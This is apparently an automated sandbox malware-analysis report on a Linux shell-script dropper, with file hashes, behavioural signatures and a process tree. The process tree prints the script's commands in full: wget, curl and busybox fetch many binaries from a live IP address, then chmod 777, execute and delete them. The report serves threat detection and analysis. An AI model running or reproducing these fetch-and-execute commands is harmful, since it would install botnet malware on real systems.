Analysis
-
max time kernel
22s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
10-11-2024 01:00
Static task
static1
Behavioral task
behavioral1
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
-
Size
10KB
-
MD5
0aab00d4e7063c05a4a2623bcf37a039
-
SHA1
f155f96de5ba4dba0e81f04fc0b9739488955248
-
SHA256
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574
-
SHA512
e4d19d1c05c96c81636e67f4a78b9021ac9ee306b17c30fbdf68f0f3bc52d9a0b7a2d1fb6706b5a507f7b1bbca57e1a2c5875c4dbe57c90cb180aeeafc800b0c
-
SSDEEP
192:U4GT9Uq+r7f9jOytEsjARO9Uq+r7fOOytEsOQ:U4GmJ/ARHfQ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 1493 chmod 1500 chmod 1542 chmod 1596 chmod 1650 chmod 1487 chmod 1512 chmod 1608 chmod 1560 chmod 1620 chmod 1614 chmod 1536 chmod 1566 chmod 1572 chmod 1584 chmod 1602 chmod 1506 chmod 1518 chmod 1530 chmod 1644 chmod 1554 chmod 1590 chmod 1626 chmod 1632 chmod 1638 chmod 1524 chmod 1548 chmod 1578 chmod -
Executes dropped EXE 28 IoCs
Processes:
d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMOb4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0JV0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpvtrEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAVz0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7Bqf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVRpgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3ymHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnFhwWR62XfsZaEQXPNSWWZ2esDst57v7Zudlnna1tBnMuEdluE4QBbRNp9nEdX5f9IHiugqScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAVz0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7Bqf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVRV0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpvtrEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3ymHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnFhwWR62XfsZaEQXPNSWWZ2esDst57v7Zudlnna1tBnMuEdluE4QBbRNp9nEdX5f9IHiugd6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMOb4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0Jioc pid process /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO 1488 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J 1494 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv 1501 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 1507 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt 1513 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV 1519 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B 1525 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc 1531 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR 1537 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 1543 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y 1549 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF 1555 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl 1561 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug 1567 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt 1573 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV 1579 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B 1585 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc 1591 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR 1597 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv 1603 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 1609 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 1615 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y 1621 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF 1627 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl 1633 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug 1639 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO 1645 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J 1651 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug curl File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV curl File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv curl File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J curl File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y curl File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt curl File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y curl File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 curl File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 curl File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 curl File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc curl File opened for modification /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl curl File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO curl File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 curl File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV curl File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR curl File opened for modification /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF curl File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR curl File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B curl File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc curl File opened for modification /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug curl File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J curl File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv curl File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt curl File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B curl File opened for modification /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl curl File opened for modification /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF curl File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO curl
Processes
-
/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh1⤵PID:1479
-
/bin/rm/bin/rm bins.sh2⤵PID:1480
-
/usr/bin/wgetwget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:1481
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Writes file to tmp directory
PID:1485 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:1486
-
/bin/chmodchmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- File and Directory Permissions Modification
PID:1487 -
/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Executes dropped EXE
PID:1488 -
/bin/rmrm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:1489
-
/usr/bin/wgetwget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:1490
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Writes file to tmp directory
PID:1491 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:1492
-
/bin/chmodchmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- File and Directory Permissions Modification
PID:1493 -
/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Executes dropped EXE
PID:1494 -
/bin/rmrm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:1495
-
/usr/bin/wgetwget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:1496
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Writes file to tmp directory
PID:1498 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:1499
-
/bin/chmodchmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- File and Directory Permissions Modification
PID:1500 -
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Executes dropped EXE
PID:1501 -
/bin/rmrm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:1502
-
/usr/bin/wgetwget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:1503
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Writes file to tmp directory
PID:1504 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:1505
-
/bin/chmodchmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- File and Directory Permissions Modification
PID:1506 -
/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Executes dropped EXE
PID:1507 -
/bin/rmrm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:1508
-
/usr/bin/wgetwget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:1509
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Writes file to tmp directory
PID:1510 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:1511
-
/bin/chmodchmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- File and Directory Permissions Modification
PID:1512 -
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Executes dropped EXE
PID:1513 -
/bin/rmrm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:1514
-
/usr/bin/wgetwget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:1515
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Writes file to tmp directory
PID:1516 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:1517
-
/bin/chmodchmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- File and Directory Permissions Modification
PID:1518 -
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Executes dropped EXE
PID:1519 -
/bin/rmrm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:1520
-
/usr/bin/wgetwget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:1521
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Writes file to tmp directory
PID:1522 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:1523
-
/bin/chmodchmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- File and Directory Permissions Modification
PID:1524 -
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Executes dropped EXE
PID:1525 -
/bin/rmrm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:1526
-
/usr/bin/wgetwget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:1527
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Writes file to tmp directory
PID:1528 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:1529
-
/bin/chmodchmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- File and Directory Permissions Modification
PID:1530 -
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Executes dropped EXE
PID:1531 -
/bin/rmrm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:1532
-
/usr/bin/wgetwget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:1533
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Writes file to tmp directory
PID:1534 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:1535
-
/bin/chmodchmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- File and Directory Permissions Modification
PID:1536 -
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Executes dropped EXE
PID:1537 -
/bin/rmrm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:1538
-
/usr/bin/wgetwget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:1539
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Writes file to tmp directory
PID:1540 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:1541
-
/bin/chmodchmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- File and Directory Permissions Modification
PID:1542 -
/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Executes dropped EXE
PID:1543 -
/bin/rmrm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:1544
-
/usr/bin/wgetwget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:1545
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Writes file to tmp directory
PID:1546 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:1547
-
/bin/chmodchmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- File and Directory Permissions Modification
PID:1548 -
/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Executes dropped EXE
PID:1549 -
/bin/rmrm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:1550
-
/usr/bin/wgetwget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:1551
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Writes file to tmp directory
PID:1552 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:1553
-
/bin/chmodchmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- File and Directory Permissions Modification
PID:1554 -
/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Executes dropped EXE
PID:1555 -
/bin/rmrm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:1556
-
/usr/bin/wgetwget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:1557
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Writes file to tmp directory
PID:1558 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:1559
-
/bin/chmodchmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- File and Directory Permissions Modification
PID:1560 -
/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Executes dropped EXE
PID:1561 -
/bin/rmrm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:1562
-
/usr/bin/wgetwget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:1563
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Writes file to tmp directory
PID:1564 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:1565
-
/bin/chmodchmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- File and Directory Permissions Modification
PID:1566 -
/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Executes dropped EXE
PID:1567 -
/bin/rmrm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:1568
-
/usr/bin/wgetwget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:1569
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Writes file to tmp directory
PID:1570 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:1571
-
/bin/chmodchmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- File and Directory Permissions Modification
PID:1572 -
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Executes dropped EXE
PID:1573 -
/bin/rmrm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:1574
-
/usr/bin/wgetwget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:1575
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Writes file to tmp directory
PID:1576 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:1577
-
/bin/chmodchmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- File and Directory Permissions Modification
PID:1578 -
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Executes dropped EXE
PID:1579 -
/bin/rmrm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:1580
-
/usr/bin/wgetwget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:1581
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Writes file to tmp directory
PID:1582 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:1583
-
/bin/chmodchmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- File and Directory Permissions Modification
PID:1584 -
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Executes dropped EXE
PID:1585 -
/bin/rmrm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:1586
-
/usr/bin/wgetwget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:1587
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Writes file to tmp directory
PID:1588 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:1589
-
/bin/chmodchmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- File and Directory Permissions Modification
PID:1590 -
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Executes dropped EXE
PID:1591 -
/bin/rmrm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:1592
-
/usr/bin/wgetwget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:1593
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Writes file to tmp directory
PID:1594 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:1595
-
/bin/chmodchmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- File and Directory Permissions Modification
PID:1596 -
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Executes dropped EXE
PID:1597 -
/bin/rmrm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:1598
-
/usr/bin/wgetwget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:1599
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Writes file to tmp directory
PID:1600 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:1601
-
/bin/chmodchmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- File and Directory Permissions Modification
PID:1602 -
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Executes dropped EXE
PID:1603 -
/bin/rmrm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:1604
-
/usr/bin/wgetwget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:1605
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Writes file to tmp directory
PID:1606 -
